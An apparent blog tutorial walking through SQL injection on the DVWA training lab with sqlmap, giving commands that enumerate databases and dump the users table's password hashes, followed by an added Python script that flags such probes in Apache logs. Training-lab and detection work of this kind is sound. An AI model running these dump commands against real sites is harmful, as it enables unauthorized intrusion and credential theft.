Sunday, 26 January 2014

Sqlmap: SQL Injection on DVWA, Medium Level

Start the local web server (Apache) and MySQL.
Open localhost/dvwa in a browser; the Mantra browser is used here because it makes this easy.
Log in with username: admin, password: password, and then create the database.


Change the DVWA security level to medium and submit.



Type 1 in the form and submit.



To check for SQL injection, use the ' character. It's a simple experiment: type 1' in the form and submit; if an error page appears, that is a vulnerability.

OK, go back to home, type 1 in the form and submit.

Run sqlmap: copy the URL.
Look up the cookie information with the browser's tools.
We get the cookie: ach8gv9j352sni9bdjgogrbp81



sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium; PHPSESSID=ach8gv9j352sni9bdjgogrbp81" --dbs



-u : Target url
--cookie : HTTP Cookie header
--dbs : Enumerate DBMS databases


# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium; PHPSESSID=ach8gv9j352sni9bdjgogrbp81" -D dvwa --tables


-D : DBMS database to enumerate
--tables : Enumerate DBMS database tables

We get 2 tables in the dvwa database. To get the IDs and passwords we must explore the users table and dump it, because the passwords are hashed.

# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=medium; PHPSESSID=ach8gv9j352sni9bdjgogrbp81" -T users --dump




-T : DBMS database table to enumerate
--dump : Dump DBMS database table entries



OK, we get the result: the IDs and passwords of the users in the DVWA web application.
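
The requests made in this walkthrough leave traces in the web server's access log. The script below is an added example, not part of the original post: it flags such requests in Apache combined-format log lines by checking for a non-numeric id on the DVWA page and for sqlmap's self-identifying User-Agent. The log lines and the names classify, scan and SAMPLE_LOG are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" format: client, timestamp, request line, status, size, referer, UA.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"'
)
SQLI_PATH = "/dvwa/vulnerabilities/sqli/"  # path taken from the URL in this post

def classify(line):
    """Return the reasons (possibly none) why a log line looks like SQLi testing."""
    m = LOG_RE.match(line)
    if not m:
        return []
    reasons = []
    url = urlsplit(m.group("target"))
    if url.path == SQLI_PATH:
        # The form expects a numeric user id; parse_qs also decodes %27 to '.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not re.fullmatch(r"[0-9]+", value):
                reasons.append("non-numeric id: %r" % value)
    # sqlmap names itself in the User-Agent header unless configured otherwise.
    if "sqlmap" in m.group("ua").lower():
        reasons.append("sqlmap user agent")
    return reasons

# Constructed sample log lines (not captured from a real server).
SAMPLE_LOG = [
    '127.0.0.1 - - [26/Jan/2014:10:00:01 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4512 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [26/Jan/2014:10:00:09 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1%27&Submit=Submit HTTP/1.1" 200 161 "-" "Mozilla/5.0"',
    '127.0.0.1 - - [26/Jan/2014:10:01:30 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4512 "-" "sqlmap/1.0-dev (http://sqlmap.org)"',
]

def scan(lines):
    """Return (line_number, reasons) for every flagged line, numbering from 1."""
    hits = []
    for n, line in enumerate(lines, 1):
        reasons = classify(line)
        if reasons:
            hits.append((n, reasons))
    return hits

if __name__ == "__main__":
    for n, reasons in scan(SAMPLE_LOG):
        print("line %d: %s" % (n, "; ".join(reasons)))
```

The User-Agent check only catches sqlmap runs like the ones above that leave the header at its default, so the non-numeric id check is the more dependable signal.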

